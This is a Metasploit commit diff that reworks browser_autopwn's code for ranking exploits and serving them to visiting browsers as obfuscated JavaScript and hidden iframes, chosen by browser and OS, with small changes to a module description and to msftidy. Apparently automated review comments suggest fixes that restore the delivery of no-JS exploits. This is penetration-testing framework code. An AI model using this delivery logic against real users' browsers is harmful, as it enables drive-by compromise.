bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions


@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'External IP', 'Name' => 'Discover External IP via Ifconfig.me',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST', 'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'], 'Author' => ['RageLtMan'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>


@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules() def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0") @lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {} @noscript_tests = {}
@all_tests = {}
print_line print_line
print_status("Starting exploit modules on host #{@lhost}...") print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end end
# Now that we've got all of our exploit tests put together, # Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and # organize them into an all tests (JS and no-JS), organized by rank,
# doesnt-require-scripting, sorted by browser name. # and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name] if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests[apo[:ua_name]].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:javascript] elsif apo[:javascript]
@js_tests["generic"] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests["generic"].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name] elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= [] @noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo) @noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else else
@noscript_tests["generic"] ||= [] @noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo) @noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end end
end end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line print_line
# Sort the tests by reliability, descending. # Sort the tests by reliability, descending.
@js_tests.each { |browser,tests| # I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
tests.sort! {|a,b| b[:rank] <=> a[:rank]} @all_tests = @all_tests.sort.reverse
}
# This matters a lot less for noscript exploits since they basically # This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load # get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests| @noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]} tests.sort! {|a,b| b[:rank] <=> a[:rank]}
} }
end end
# #
@ -746,83 +748,66 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries # if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected # to only send tests for exploits that target the client's detected
# browser. # browser.
@js_tests.each { |browser, sploits|
next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the @all_tests.each { |rank, sploits|
# client is nil, then we don't know what it really is, so just err sploits.each { |s|
# on the side of shells and send everything. Otherwise, send only browser = s[:ua_name] || "generic"
# if the client is using the browser associated with this set of next unless client_matches_browser(client_info, browser)
# exploits.
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true"
else
# get rid of newlines and escape quotes
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
end
# shouldn't be any in the resource, but just in case...
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
# Skip exploits that don't match the client's OS. # Send all the generics regardless of what the client is. If the
if (host_info and host_info[:os_name] and s[:os_name]) # client is nil, then we don't know what it really is, so just err
# Reject exploits whose OS doesn't match that of the # on the side of shells and send everything. Otherwise, send only
# victim. Note that host_info comes from javascript OS # if the client is using the browser associated with this set of
# detection, NOT the database. # exploits.
if host_info[:os_name] != "undefined" if s[:javascript]
unless s[:os_name].include?(host_info[:os_name]) if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
vprint_status("Rejecting #{s[:name]} for non-matching OS") if s[:vuln_test].nil? or s[:vuln_test].empty?
next test = "is_vuln = true"
else
# get rid of newlines and escape quotes
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
end
# shouldn't be any in the resource, but just in case...
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
# Skip exploits that don't match the client's OS.
if (host_info and host_info[:os_name] and s[:os_name])
# Reject exploits whose OS doesn't match that of the
# victim. Note that host_info comes from javascript OS
# detection, NOT the database.
if host_info[:os_name] != "undefined"
unless s[:os_name].include?(host_info[:os_name])
vprint_status("Rejecting #{s[:name]} for non-matching OS")
next
end
end end
end end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
else
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
else
# Some other kind of exploit that we can't generically
# check for in javascript, throw it on the pile.
noscript_html << html_for_exploit(s, client_info)
end end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
sploits_for_this_client.push s[:name] sploits_for_this_client.push s[:name]
sploit_cnt += 1 sploit_cnt += 1
end end
end }
} }
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
else
# Some other kind of exploit that we can't generically
# check for in javascript, throw it on the pile.
noscript_html << html_for_exploit(s, client_info)
end
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n" js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n" js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"] js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}" response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits") print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name| sploits_for_this_client.each do |name|
vprint_status("* #{name}") vprint_status("* #{name}")
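Review bot: In the @ -746 hunk the merged loop still appends to `noscript_html` (`noscript_html << html_for_exploit(s, client_info)`), but the `noscript_html = ""` initialisation and the block that emitted it into the response (`js << %Q|var noscript_exploits = "|` through `js << %Q|document.body.appendChild(noscript_div);\n|`) appear only on the removed side; unless they now live earlier in the method, outside this hunk, the first non-JS, non-java exploit raises NameError and no-JS exploits are never delivered to the client at all. Restoring `noscript_html = ""` before `@all_tests.each { |rank, sploits|` and the noscript_exploits emission just before `js << "window.next_exploit(0);\n"` would address both. Separately, in the @ -501 hunk `@all_tests = @all_tests.sort.reverse` silently turns the Hash into an Array of [rank, tests] pairs, which the new `each { |rank, sploits| ... }` tolerates but any later `@all_tests[rank]` lookup would not; `@all_tests = Hash[@all_tests.sort_by { |rank, _| rank }.reverse]` keeps the type (Ruby hashes preserve insertion order) and sorts on the rank alone, and the unused `rank` block parameter could be written `_rank`. The enclosing method starts before and ends after these hunks.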


@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/ if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split words = $1.split
words.each do |word| words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word) if %w{and or the for to in of as with a an on at via}.include?(word)
next next
elsif %w{pbot}.include?(word) elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/ elsif word =~ /^[a-z]+$/
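Review bot: The stop-word allow-list in `if %w{and or the for to in of as with a an on at via}.include?(word)` is rebuilt on every iteration of `words.each`; now that it is growing, hoisting it to a frozen class-level constant such as `TITLE_STOP_WORDS = %w{and or the for to in of as with a an on at via}.freeze` and testing `TITLE_STOP_WORDS.include?(word)` keeps the list in one reviewable place and avoids the per-word allocation. The `$1` captured from the `'Name'` regexp on the first line could likewise be named via `Regexp.last_match(1)` for readability. The enclosing method begins and ends outside this hunk.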